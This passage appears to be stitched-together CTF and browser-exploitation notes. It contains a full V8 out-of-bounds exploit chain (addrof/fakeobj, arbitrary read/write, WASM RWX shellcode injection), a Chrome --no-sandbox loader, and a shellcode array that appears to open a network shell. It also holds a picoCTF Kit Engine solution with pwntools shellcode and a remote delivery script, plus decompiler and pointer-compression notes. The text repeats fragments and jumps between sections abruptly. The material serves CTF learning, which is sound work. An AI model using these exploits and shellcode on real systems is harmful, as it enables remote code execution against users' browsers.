let buf_addr = addrof(buf);
let backing_store_addr = buf_addr + 0x20n;
initial_arb_write(backing_store_addr, addr);
// write the shellcode 4 bytes at a time
for (let i = 0; i < shellcode.length; i++) {
dataview.setUint32(4*i, shellcode[i], true);
}
}
// https://xz.aliyun.com/t/5003
var shellcode=[0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];
console.log("[+] Copying Shellcode...");
copy_shellcode(rwx_base, shellcode);
console.log("[+] Running Shellcode...");
f();
$ ./d8 --shell exploit2.js
[+] Address of Arbitrary RW Array: 0x19b85504fea1
[+] WASM Instance at 0x189e40ca1761
[+] RWX Region located at 0x29686af10000
[+] Copying Shellcode...
[+] Running Shellcode...
Warning: Cannot convert string "-adobe-symbol-*-*-*-*-*-120-*-*-*-*-*-*" to type FontStruct
// conversion functions
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
function ftoi(val) { // typeof(val) = float
f64_buf[0] = val;
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}
function itof(val) { // typeof(val) = BigInt
u64_buf[0] = Number(val & 0xffffffffn);
u64_buf[1] = Number(val >> 32n);
return f64_buf[0];
}
// others
var float_arr = [1.5, 2.5];
var map_float = float_arr.oob();
var initial_obj = {a:1}; // placeholder object
var obj_arr = [initial_obj];
var map_obj = obj_arr.oob();
function addrof(obj) {
obj_arr[0] = obj; // put desired obj for address leak into index 0
obj_arr.oob(map_float); // change to float map
let leak = obj_arr[0]; // read address
obj_arr.oob(map_obj); // change back to object map, to prevent issues down the line
return ftoi(leak); // return leak as an integer
}
function fakeobj(addr) {
float_arr[0] = itof(addr); // placed desired address into index 0
float_arr.oob(map_obj); // change to object map
let fake = float_arr[0]; // get fake object
float_arr.oob(map_float); // swap map back
return fake; // return object
}
// array for access to arbitrary memory addresses
var arb_rw_arr = [map_float, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));
function arb_read(addr) {
// tag pointer
if (addr % 2n == 0)
addr += 1n;
// place a fake object over the elements FixedDoubleArray of the valid array
// we know the elements array is placed just ahead in memory, so with a length
// of 4 it's an offset of 4 * 0x8 = 0x20
let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
// overwrite `elements` field of fake array with address
// we must subtract 0x10 as there are two 64-bit values
// initially with the map and a size smi, so 0x10 offset
arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);
// index 0 will return the arbitrary read value
return ftoi(fake[0]);
}
function initial_arb_write(addr, val) {
// place a fake object and change elements, as before
let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
arb_rw_arr[2] = itof(BigInt(addr) - 0x10n);
// Write to index 0
fake[0] = itof(BigInt(val));
}
function arb_write(addr, val) {
// set up ArrayBuffer and DataView objects
let buf = new ArrayBuffer(8);
let dataview = new DataView(buf);
let buf_addr = addrof(buf);
let backing_store_addr = buf_addr + 0x20n;
// write the address to the backing store
initial_arb_write(backing_store_addr, addr);
// write data to offset 0, with little endian true
dataview.setBigUint64(0, BigInt(val), true);
}
// wasm exploit
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;
console.log("[+] WASM Instance at 0x" + (addrof(wasm_instance)).toString(16));
// leak RWX base
let rwx_pointer_loc = addrof(wasm_instance) + 0x87n;
let rwx_base = arb_read(rwx_pointer_loc)
console.log("[+] RWX Region located at 0x" + rwx_base.toString(16));
// shellcode time
function copy_shellcode(addr, shellcode) {
// create a buffer of 0x100 bytes
let buf = new ArrayBuffer(0x100);
let dataview = new DataView(buf);
// overwrite the backing store so the 0x100 bytes can be written to where we want
let buf_addr = addrof(buf);
let backing_store_addr = buf_addr + 0x20n;
initial_arb_write(backing_store_addr, addr);
// write the shellcode 4 bytes at a time
for (let i = 0; i < shellcode.length; i++) {
dataview.setUint32(4*i, shellcode[i], true);
}
}
// https://xz.aliyun.com/t/5003
var shellcode=[0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];
// pop it
console.log("[+] Copying Shellcode...");
copy_shellcode(rwx_base, shellcode);
console.log("[+] Running Shellcode...");
f();
<html>
<head>
<script src="exploit2.js"></script>
</head>
</html>
$ ./chrome --no-sandbox ../../index.html
var shellcode = ['0x6a58296a', '0x016a5f02', '0x050f995e', '0x68525f50', '0x0100007f', '0x5c116866', '0x6a026a66', '0x5e54582a', '0x0f5a106a', '0x5e026a05', '0x0f58216a', '0xceff4805', '0x016af679', '0x50b94958', '0x77737361', '0x41203a64', '0x6a5e5451', '0x050f5a08', '0x48c03148', '0x0f08c683', '0x31b84805', '0x35343332', '0x56383736', '0x75af485f', '0x583b6a1a', '0xbb485299', '0x6e69622f', '0x68732f2f', '0x525f5453', '0x54575a54', '0x90050f5e']
How decompilers do stuff
These tricks include notes for Binary Ninja, but IDA looks similar (and I'm sure Ghidra does too).
Example code:
char rax_3 = *std::vector<uint8_t>::operator[](&vector, sx.q(j))
*std::vector<uint8_t>::operator[](&vector, sx.q(j)) = *std::string::operator[](arg1, other: j) ^ rax_3
Looks really bizarre and overwhelming, but look at the words. std::vector<uint8_t>::operator[]
literally means the operator []
, the subscript operator. It applies the subscript to the first parameter, with the second parameter as the index. So
std::vector<uint8_t>::operator[](&vector, sx.q(j))
Is really just
vector[j]
Also, if it doesn't make sense, try changing the types to add extra arguments! The automatic detection is pretty trash, and it might help a lot.
A non-exhaustive list is:
std::T::~T - the destructor of class T (parameters: T*)
std::vector<T>::operator[](&vector, sx.q(j)) - vector[j] (parameters: T*, int64_t)
A lesson in floating-point form
You will need an account for picoCTF to play this. The accounts are free, and there are hundreds of challenges for all categories - highly recommend it!
We are given d8
, source.tar.gz
and server.py
. Let's look at server.py
first:
#!/usr/bin/env python3
# With credit/inspiration to the v8 problem in downUnder CTF 2020
import os
import subprocess
import sys
import tempfile
def p(a):
print(a, flush=True)
MAX_SIZE = 20000
input_size = int(input("Provide size. Must be < 5k:"))
if input_size >= MAX_SIZE:
p(f"Received size of {input_size}, which is too big")
sys.exit(-1)
p(f"Provide script please!!")
script_contents = sys.stdin.read(input_size)
p(script_contents)
# Don't buffer
with tempfile.NamedTemporaryFile(buffering=0) as f:
f.write(script_contents.encode("utf-8"))
p("File written. Running. Timeout is 20s")
res = subprocess.run(["./d8", f.name], timeout=20, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p("Run Complete")
p(f"Stdout {res.stdout}")
p(f"Stderr {res.stderr}")
It's very simple - you input the size of the file, and then you input the file itself. The file contents get written to a javascript file, then run under ./d8
with the output returned. Let's check the source code.
$ 7z x source.tar.gz
$ tar -xvf source.tar
The patch
is as follows:
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index e6fb20d152..35195b9261 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -979,6 +979,53 @@ struct ModuleResolutionData {
} // namespace
+uint64_t doubleToUint64_t(double d){
+ union {
+ double d;
+ uint64_t u;
+ } conv = { .d = d };
+ return conv.u;
+}
+
+void Shell::Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args) {
+ __asm__("int3");
+}
+
+void Shell::AssembleEngine(const v8::FunctionCallbackInfo<v8::Value>& args) {
+ Isolate* isolate = args.GetIsolate();
+ if(args.Length() != 1) {
+ return;
+ }
+
+ double *func = (double *)mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ if (func == (double *)-1) {
+ printf("Unable to allocate memory. Contact admin\n");
+ return;
+ }
+
+ if (args[0]->IsArray()) {
+ Local<Array> arr = args[0].As<Array>();
+
+ Local<Value> element;
+ for (uint32_t i = 0; i < arr->Length(); i++) {
+ if (arr->Get(isolate->GetCurrentContext(), i).ToLocal(&element) && element->IsNumber()) {
+ Local<Number> val = element.As<Number>();
+ func[i] = val->Value();
+ }
+ }
+
+ printf("Memory Dump. Watch your endianness!!:\n");
+ for (uint32_t i = 0; i < arr->Length(); i++) {
+ printf("%d: float %f hex %lx\n", i, func[i], doubleToUint64_t(func[i]));
+ }
+
+ printf("Starting your engine!!\n");
+ void (*foo)() = (void(*)())func;
+ foo();
+ }
+ printf("Done\n");
+}
+
void Shell::ModuleResolutionSuccessCallback(
const FunctionCallbackInfo<Value>& info) {
std::unique_ptr<ModuleResolutionData> module_resolution_data(
@@ -2201,40 +2248,15 @@ Local<String> Shell::Stringify(Isolate* isolate, Local<Value> value) {
Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
- global_template->Set(Symbol::GetToStringTag(isolate),
- String::NewFromUtf8Literal(isolate, "global"));
+ // Add challenge builtin, and remove some unintented solutions
+ global_template->Set(isolate, "AssembleEngine", FunctionTemplate::New(isolate, AssembleEngine));
+ global_template->Set(isolate, "Breakpoint", FunctionTemplate::New(isolate, Breakpoint));
global_template->Set(isolate, "version",
FunctionTemplate::New(isolate, Version));
-
global_template->Set(isolate, "print", FunctionTemplate::New(isolate, Print));
- global_template->Set(isolate, "printErr",
- FunctionTemplate::New(isolate, PrintErr));
- global_template->Set(isolate, "write", FunctionTemplate::New(isolate, Write));
- global_template->Set(isolate, "read", FunctionTemplate::New(isolate, Read));
- global_template->Set(isolate, "readbuffer",
- FunctionTemplate::New(isolate, ReadBuffer));
- global_template->Set(isolate, "readline",
- FunctionTemplate::New(isolate, ReadLine));
- global_template->Set(isolate, "load", FunctionTemplate::New(isolate, Load));
- global_template->Set(isolate, "setTimeout",
- FunctionTemplate::New(isolate, SetTimeout));
- // Some Emscripten-generated code tries to call 'quit', which in turn would
- // call C's exit(). This would lead to memory leaks, because there is no way
- // we can terminate cleanly then, so we need a way to hide 'quit'.
if (!options.omit_quit) {
global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
}
- global_template->Set(isolate, "testRunner",
- Shell::CreateTestRunnerTemplate(isolate));
- global_template->Set(isolate, "Realm", Shell::CreateRealmTemplate(isolate));
- global_template->Set(isolate, "performance",
- Shell::CreatePerformanceTemplate(isolate));
- global_template->Set(isolate, "Worker", Shell::CreateWorkerTemplate(isolate));
- // Prevent fuzzers from creating side effects.
- if (!i::FLAG_fuzzing) {
- global_template->Set(isolate, "os", Shell::CreateOSTemplate(isolate));
- }
- global_template->Set(isolate, "d8", Shell::CreateD8Template(isolate));
#ifdef V8_FUZZILLI
global_template->Set(
@@ -2243,11 +2265,6 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
FunctionTemplate::New(isolate, Fuzzilli), PropertyAttribute::DontEnum);
#endif // V8_FUZZILLI
- if (i::FLAG_expose_async_hooks) {
- global_template->Set(isolate, "async_hooks",
- Shell::CreateAsyncHookTemplate(isolate));
- }
-
return global_template;
}
@@ -2449,10 +2466,10 @@ void Shell::Initialize(Isolate* isolate, D8Console* console,
v8::Isolate::kMessageLog);
}
- isolate->SetHostImportModuleDynamicallyCallback(
+ /*isolate->SetHostImportModuleDynamicallyCallback(
Shell::HostImportModuleDynamically);
isolate->SetHostInitializeImportMetaObjectCallback(
- Shell::HostInitializeImportMetaObject);
+ Shell::HostInitializeImportMetaObject);*/
#ifdef V8_FUZZILLI
// Let the parent process (Fuzzilli) know we are ready.
diff --git a/src/d8/d8.h b/src/d8/d8.h
index a6a1037cff..4591d27f65 100644
--- a/src/d8/d8.h
+++ b/src/d8/d8.h
@@ -413,6 +413,9 @@ class Shell : public i::AllStatic {
kNoProcessMessageQueue = false
};
+ static void AssembleEngine(const v8::FunctionCallbackInfo<v8::Value>& args);
+ static void Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args);
+
static bool ExecuteString(Isolate* isolate, Local<String> source,
Local<Value> name, PrintResult print_result,
ReportExceptions report_exceptions,
This is just generally quite strange. The only particularly relevant part is the new AssembleEngine()
function:
void Shell::AssembleEngine(const v8::FunctionCallbackInfo<v8::Value>& args) {
Isolate* isolate = args.GetIsolate();
if(args.Length() != 1) {
return;
}
double *func = (double *)mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (func == (double *)-1) {
printf("Unable to allocate memory. Contact admin\n");
return;
}
if (args[0]->IsArray()) {
Local<Array> arr = args[0].As<Array>();
Local<Value> element;
for (uint32_t i = 0; i < arr->Length(); i++) {
if (arr->Get(isolate->GetCurrentContext(), i).ToLocal(&element) && element->IsNumber()) {
Local<Number> val = element.As<Number>();
func[i] = val->Value();
}
}
printf("Memory Dump. Watch your endianness!!:\n");
for (uint32_t i = 0; i < arr->Length(); i++) {
printf("%d: float %f hex %lx\n", i, func[i], doubleToUint64_t(func[i]));
}
printf("Starting your engine!!\n");
void (*foo)() = (void(*)())func;
foo();
}
printf("Done\n");
}
This is a pretty strange function to have, but the process is simple. First there are a couple of preliminary steps, and if either fails, the function returns early:
Check that the number of arguments is 1
Allocate 4096 bytes of memory with RWX permissions using mmap()
Then, if the first argument is an array, we cast it to one and store it in arr
. We then loop through arr
, and for every index i
, we store the result in the local variable element
. If it's a number, it gets written to func
at the corresponding offset. Essentially, it copies the entirety of arr
to func
! With some added checks to make sure the types are correct.
There is then a memory dump of func
, just to simplify things.
And then finally execution is continued from func
, like a classic shellcoding challenge!
This isn't really much of a V8-specific challenge - the data we input is run as shellcode, and the output is returned to us.
HOWEVER
val->Value()
actually returns a floating-point value (a double
), not an integer. Maybe you could get this from the source code, but you could also get it from the mmap()
line:
double *func = (double *)mmap(NULL, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
You can see it's all double
values. This means we have to inject shellcode, but in their floating-point form rather than as integers.
If you've read the oob-v8 writeup, you'll know there are common helper functions for converting the integers we want written to memory into the floating-point values that represent them (and if you haven't, check it out).
function itof(val) { // typeof(val) = BigInt
u64_buf[0] = Number(val & 0xffffffffn);
u64_buf[1] = Number(val >> 32n);
return f64_buf[0];
}
So now we just need to get valid shellcode, convert it into 64-bit integers and find the float equivalent. Once we make the array, we simply call AssembleEngine()
on it and it executes it for us. Easy peasy!
We can't actually interact with the process, only get stdout
and stderr
, so we'll have to go to a direct read of flag.txt
. We can use pwntools to generate the shellcode for this:
from pwn import *
context.os = 'linux'
context.arch = 'amd64'
shellcode = asm(shellcraft.cat('flag.txt'))
We want to convert shellcode
to bytes, then group them into 64-bit integers so we can transform them to floats. Additionally, the bytes within each 64-bit integer have to be in reverse order for endianness! We'll let python do all of that for us:
from pwn import *
# set all the context
context.os = 'linux'
context.arch = 'amd64'
# create the shellcode
shellcode = asm(shellcraft.cat('flag.txt'))
print(shellcode)
# pad it to a multiple of 8 with NOP instructions
# this means the conversion to 8-byte values is smoother
shellcode += b'\x90' * (-len(shellcode) % 8)
# get the hex codes for every byte and store them as a string in the list
shellcode = [hex(c)[2:].rjust(2, '0') for c in shellcode]
# get the shellcode bytes in packs of 8, in reverse order for endianness, with 0x at the front
eight_bytes = ['0x' + ''.join(shellcode[i:i+8][::-1]) for i in range(0, len(shellcode), 8)]
print(eight_bytes)
We can dump this (after minor cleanup) into exploit.js
and convert the entire list to floats before calling AssembleEngine()
. Make sure you put the n
after every 64-bit value, to signify to JavaScript that it's a BigInt
type!
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
function itof(val) { // typeof(val) = BigInt
u64_buf[0] = Number(val & 0xffffffffn);
u64_buf[1] = Number(val >> 32n);
return f64_buf[0];
}
// needs to have the `n` to be a BigInt value!
payload = [0x66b848240cfe016an, 0x507478742e67616cn, 0xf631e7894858026an, 0x7fffffffba41050fn, 0x016a58286ac68948n, 0x90909090050f995fn]
payload_float = []
for (let i = 0; i < payload.length; i++) {
payload_float.push(itof(payload[i]))
}
AssembleEngine(payload_float)
And finally we can deliver it with a python script using pwntools
, and parse the input to get the important bit:
from pwn import *
with open("exploit.js", "rb") as f:
exploit = f.read()
p = remote('mercury.picoctf.net', 48700)
p.sendlineafter(b'5k:', str(len(exploit)).encode())
p.sendlineafter(b'please!!\n', exploit)
p.recvuntil(b"Stdout b'")
flag = p.recvuntil(b"\\")[:-1]
print(flag.decode())
And we get the flag:
picoCTF{vr00m_vr00m_48f07b402a4020e0}
Reversing C++ can be a pain, and part of the reason for that is that in C++ a std::string
can be dynamically-sized. This means its appearance in memory is more complex than a char[]
that you would find in C, because std::string
actually contains 3 fields:
Pointer to the allocated memory (the actual string itself)
Logical size of string
Size of allocated memory (which must be bigger than or equal to logical size)
The actual string content is dynamically allocated on the heap. As a result, std::string
looks something like this in memory:
class std::string
{
char* buf;
size_t len;
size_t allocated_len;
};
This is not necessarily a consistent implementation, which is why many decompilers don't recognise strings immediately - they can vary between compilers and different versions.
Decompilers can confuse us even more depending on how they optimise small objects. Simply put, we would prefer to avoid allocating space on the heap unless absolutely necessary, so if the string is short enough, we try to fit it within the std::string
struct itself. For example:
class std::string
{
char* buf;
size_t len;
// union is used to store different data types in the same memory location
// this saves space in case only one of them is necessary
union
{
size_t allocated_len;
char local_buf[8];
};
};
In this example, if the string is 8 bytes or less, local_buf
is used and the string is stored there instead. buf
will then point at local_buf
, and no heap allocation is used.
An analysis of different compilers' approaches to Small Object Optimization can be found here.
Another OOB, but with pointer compression
server.py
is the same as in Kit Engine - send it a JS file, it gets run.
Let's check the patch
again:
diff --git a/BUILD.gn b/BUILD.gn
index 9482b977e3..6a3f1e2d0f 100644
--- a/BUILD.gn
+++ b/BUILD.gn
@@ -1175,6 +1175,7 @@ action("postmortem-metadata") {
}
torque_files = [
+ "src/builtins/array-horsepower.tq",
"src/builtins/aggregate-error.tq",
"src/builtins/array-at.tq",
"src/builtins/array-copywithin.tq",
diff --git a/src/builtins/array-horsepower.tq b/src/builtins/array-horsepower.tq
new file mode 100644
index 0000000000..7ea53ca306
--- /dev/null
+++ b/src/builtins/array-horsepower.tq
@@ -0,0 +1,17 @@
+// Gotta go fast!!
+
+namespace array {
+
+transitioning javascript builtin
+ArraySetHorsepower(
+ js-implicit context: NativeContext, receiver: JSAny)(horsepower: JSAny): JSAny {
+ try {
+ const h: Smi = Cast<Smi>(horsepower) otherwise End;
+ const a: JSArray = Cast<JSArray>(receiver) otherwise End;
+ a.SetLength(h);
+ } label End {
+ Print("Improper attempt to set horsepower");
+ }
+ return receiver;
+}
+}
\ No newline at end of file
diff --git a/src/d8/d8.cc b/src/d8/d8.cc
index e6fb20d152..abfb553864 100644
--- a/src/d8/d8.cc
+++ b/src/d8/d8.cc
@@ -999,6 +999,10 @@ void Shell::ModuleResolutionSuccessCallback(
resolver->Resolve(realm, module_namespace).ToChecked();
}
+void Shell::Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args) {
+ __asm__("int3");
+}
+
void Shell::ModuleResolutionFailureCallback(
const FunctionCallbackInfo<Value>& info) {
std::unique_ptr<ModuleResolutionData> module_resolution_data(
@@ -2201,40 +2205,14 @@ Local<String> Shell::Stringify(Isolate* isolate, Local<Value> value) {
Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
Local<ObjectTemplate> global_template = ObjectTemplate::New(isolate);
- global_template->Set(Symbol::GetToStringTag(isolate),
- String::NewFromUtf8Literal(isolate, "global"));
+ // Remove some unintented solutions
+ global_template->Set(isolate, "Breakpoint", FunctionTemplate::New(isolate, Breakpoint));
global_template->Set(isolate, "version",
FunctionTemplate::New(isolate, Version));
-
global_template->Set(isolate, "print", FunctionTemplate::New(isolate, Print));
- global_template->Set(isolate, "printErr",
- FunctionTemplate::New(isolate, PrintErr));
- global_template->Set(isolate, "write", FunctionTemplate::New(isolate, Write));
- global_template->Set(isolate, "read", FunctionTemplate::New(isolate, Read));
- global_template->Set(isolate, "readbuffer",
- FunctionTemplate::New(isolate, ReadBuffer));
- global_template->Set(isolate, "readline",
- FunctionTemplate::New(isolate, ReadLine));
- global_template->Set(isolate, "load", FunctionTemplate::New(isolate, Load));
- global_template->Set(isolate, "setTimeout",
- FunctionTemplate::New(isolate, SetTimeout));
- // Some Emscripten-generated code tries to call 'quit', which in turn would
- // call C's exit(). This would lead to memory leaks, because there is no way
- // we can terminate cleanly then, so we need a way to hide 'quit'.
if (!options.omit_quit) {
global_template->Set(isolate, "quit", FunctionTemplate::New(isolate, Quit));
}
- global_template->Set(isolate, "testRunner",
- Shell::CreateTestRunnerTemplate(isolate));
- global_template->Set(isolate, "Realm", Shell::CreateRealmTemplate(isolate));
- global_template->Set(isolate, "performance",
- Shell::CreatePerformanceTemplate(isolate));
- global_template->Set(isolate, "Worker", Shell::CreateWorkerTemplate(isolate));
- // Prevent fuzzers from creating side effects.
- if (!i::FLAG_fuzzing) {
- global_template->Set(isolate, "os", Shell::CreateOSTemplate(isolate));
- }
- global_template->Set(isolate, "d8", Shell::CreateD8Template(isolate));
#ifdef V8_FUZZILLI
global_template->Set(
@@ -2243,11 +2221,6 @@ Local<ObjectTemplate> Shell::CreateGlobalTemplate(Isolate* isolate) {
FunctionTemplate::New(isolate, Fuzzilli), PropertyAttribute::DontEnum);
#endif // V8_FUZZILLI
- if (i::FLAG_expose_async_hooks) {
- global_template->Set(isolate, "async_hooks",
- Shell::CreateAsyncHookTemplate(isolate));
- }
-
return global_template;
}
@@ -2449,10 +2422,10 @@ void Shell::Initialize(Isolate* isolate, D8Console* console,
v8::Isolate::kMessageLog);
}
- isolate->SetHostImportModuleDynamicallyCallback(
+ /*isolate->SetHostImportModuleDynamicallyCallback(
Shell::HostImportModuleDynamically);
isolate->SetHostInitializeImportMetaObjectCallback(
- Shell::HostInitializeImportMetaObject);
+ Shell::HostInitializeImportMetaObject);*/
#ifdef V8_FUZZILLI
// Let the parent process (Fuzzilli) know we are ready.
diff --git a/src/d8/d8.h b/src/d8/d8.h
index a6a1037cff..7cf66d285a 100644
--- a/src/d8/d8.h
+++ b/src/d8/d8.h
@@ -413,6 +413,8 @@ class Shell : public i::AllStatic {
kNoProcessMessageQueue = false
};
+ static void Breakpoint(const v8::FunctionCallbackInfo<v8::Value>& args);
+
static bool ExecuteString(Isolate* isolate, Local<String> source,
Local<Value> name, PrintResult print_result,
ReportExceptions report_exceptions,
diff --git a/src/init/bootstrapper.cc b/src/init/bootstrapper.cc
index ce3886e87e..6621a79618 100644
--- a/src/init/bootstrapper.cc
+++ b/src/init/bootstrapper.cc
@@ -1754,6 +1754,8 @@ void Genesis::InitializeGlobal(Handle<JSGlobalObject> global_object,
JSObject::AddProperty(isolate_, proto, factory->constructor_string(),
array_function, DONT_ENUM);
+ SimpleInstallFunction(isolate_, proto, "setHorsepower",
+ Builtins::kArraySetHorsepower, 1, false);
SimpleInstallFunction(isolate_, proto, "concat", Builtins::kArrayConcat, 1,
false);
SimpleInstallFunction(isolate_, proto, "copyWithin",
diff --git a/src/objects/js-array.tq b/src/objects/js-array.tq
index b18f5bafac..b466b330cd 100644
--- a/src/objects/js-array.tq
+++ b/src/objects/js-array.tq
@@ -28,6 +28,9 @@ extern class JSArray extends JSObject {
macro IsEmpty(): bool {
return this.length == 0;
}
+ macro SetLength(l: Smi) {
+ this.length = l;
+ }
length: Number;
}
The only really relevant code is here:
ArraySetHorsepower(js-implicit context: NativeContext, receiver: JSAny)(horsepower: JSAny): JSAny {
try {
const h: Smi = Cast<Smi>(horsepower) otherwise End;
const a: JSArray = Cast<JSArray>(receiver) otherwise End;
a.SetLength(h);
} label End {
Print("Improper attempt to set horsepower");
}
return receiver;
}
macro SetLength(l: Smi) {
this.length = l;
}
SimpleInstallFunction(isolate_, proto, "setHorsepower",
Builtins::kArraySetHorsepower, 1, false);
We can essentially set the length
of an array by using .setHorsepower()
. By setting it to a larger value, we can get an OOB read and write, from which point it would be very similar to the oob-v8 writeup.
Let's first try and check the OOB works as we expected. We're gonna create an exploit.js
with the classic ftoi()
and itof()
functions:
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
function ftoi(val) { // typeof(val) = float
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}
function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}
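As a quick sanity check (these exact calls are my own, not from the original writeup), the helpers should round-trip values like this:
// Quick sanity check of the conversion helpers
console.log(ftoi(1.5).toString(16));                   // "3ff8000000000000" - the IEEE-754 bits of 1.5
console.log(itof(0x4004000000000000n));                // 2.5
console.log(ftoi(itof(0xdeadbeefn)) === 0xdeadbeefn);  // true - round-trips cleanly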
Then load up d8 under GDB. This version is a lot newer than the one from OOB-V8, so let's work out what is what.
$ gdb d8
gef➤ run --allow-natives-syntax --shell exploit.js
d8> a = [1.5, 2.5]
[1.5, 2.5]
d8> %DebugPrint(a)
DebugPrint: 0xa5e08085179: [JSArray]
- map: 0x0a5e082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
- prototype: 0x0a5e0820ab61 <JSArray[0]>
- elements: 0x0a5e08085161 <FixedDoubleArray[2]> [PACKED_DOUBLE_ELEMENTS]
- length: 2
- properties: 0x0a5e0804222d <FixedArray[0]>
- All own properties (excluding elements): {
0xa5e080446d1: [String] in ReadOnlySpace: #length: 0x0a5e0818215d <AccessorInfo> (const accessor descriptor), location: descriptor
}
- elements: 0x0a5e08085161 <FixedDoubleArray[2]> {
0: 1.5
1: 2.5
}
0xa5e082439f1: [Map]
- type: JS_ARRAY_TYPE
- instance size: 16
- inobject properties: 0
- elements kind: PACKED_DOUBLE_ELEMENTS
- unused property fields: 0
- enum length: invalid
- back pointer: 0x0a5e082439c9 <Map(HOLEY_SMI_ELEMENTS)>
- prototype_validity cell: 0x0a5e08182405 <Cell value= 1>
- instance descriptors #1: 0x0a5e0820b031 <DescriptorArray[1]>
- transitions #1: 0x0a5e0820b07d <TransitionArray[4]>Transition array #1:
0x0a5e08044fd5 <Symbol: (elements_transition_symbol)>: (transition to HOLEY_DOUBLE_ELEMENTS) -> 0x0a5e08243a19 <Map(HOLEY_DOUBLE_ELEMENTS)>
- prototype: 0x0a5e0820ab61 <JSArray[0]>
- constructor: 0x0a5e0820a8f1 <JSFunction Array (sfi = 0xa5e0818ac31)>
- dependent code: 0x0a5e080421b9 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>
- construction counter: 0
[1.5, 2.5]
gef➤ x/10gx 0xa5e08085179-1 <--- -1 needed due to pointer tagging!
0xa5e08085178: 0x0804222d082439f1 0x0000000408085161
0xa5e08085188: 0x58f55236080425a9 0x7566280a00000adc
0xa5e08085198: 0x29286e6f6974636e 0x20657375220a7b20
0xa5e080851a8: 0x3b22746369727473 0x6d2041202f2f0a0a
0xa5e080851b8: 0x76696e752065726f 0x7473206c61737265
So, right off the bat there are some differences. For example, look at the first value 0x0804222d082439f1
. What on earth is that? Well, if you have eagle eyes or are familiar with a new V8 feature called pointer compression, you may notice that it lines up with the properties
and the map
:
- map: 0x0a5e082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
- properties: 0x0a5e0804222d <FixedArray[0]>
Notice that only the lower 4 bytes of each pointer are stored in that value 0x0804222d082439f1
- the upper 4 bytes of the value are the lower 4 bytes of the properties
pointer, and the lower 4 bytes of the value are the lower 4 bytes of the map
pointer.
This is a new feature added to V8 in 2020 called pointer compression. The upper 4 bytes of heap pointers are no longer stored, since they are identical for every pointer into the heap - instead they are kept once as a single base, and only the lower 4 bytes of each pointer are stored. The upper 4 bytes, known as the isolate root, are held in the R13 register. More information can be found in this blog post, but it's made a big difference to memory usage and performance. As well as pointers, smis have also changed representation - instead of being 32-bit values left-shifted by 32 bits to differentiate them from pointers, they are now simply doubled (left-shifted by one bit) and therefore also fit in 32 bits.
A double is stored as its 64-bit binary representation
An smi is a 32-bit number, but it's stored as itself left-shifted by 1 so the bottom bit is 0
e.g. 0x12345678
is stored as 0x2468acf0
A pointer to an address addr
is stored as addr | 1
, that is the least significant bit is set to 1
.
e.g. 0x12345678
is stored as 0x12345679
This helps differentiate it from an smi, but not from a double!
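To make those encodings concrete, here is a small sketch - the helper names are my own, purely for illustration:
// Illustrative helpers for the value encodings described above (names are hypothetical)
function encode_smi(n) { return BigInt(n) << 1n; }   // smi: value doubled
function decode_smi(v) { return v >> 1n; }
function tag_ptr(addr) { return addr | 1n; }         // pointer: low bit set
function untag_ptr(v)  { return v & ~1n; }
// e.g. encode_smi(0x12345678) == 0x2468acf0n, tag_ptr(0x12345678n) == 0x12345679n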
We can see an example of an smi in the second value from the x/10gx
command above: 0x0000000408085161
. The upper 4 bytes are 4
, which is double 2
, so this is the length of the array. The lower 4 bytes correspond to the pointer to the elements
array, which stores the values themselves. Let's double-check that:
gef➤ x/4gx 0x0a5e08085161-1
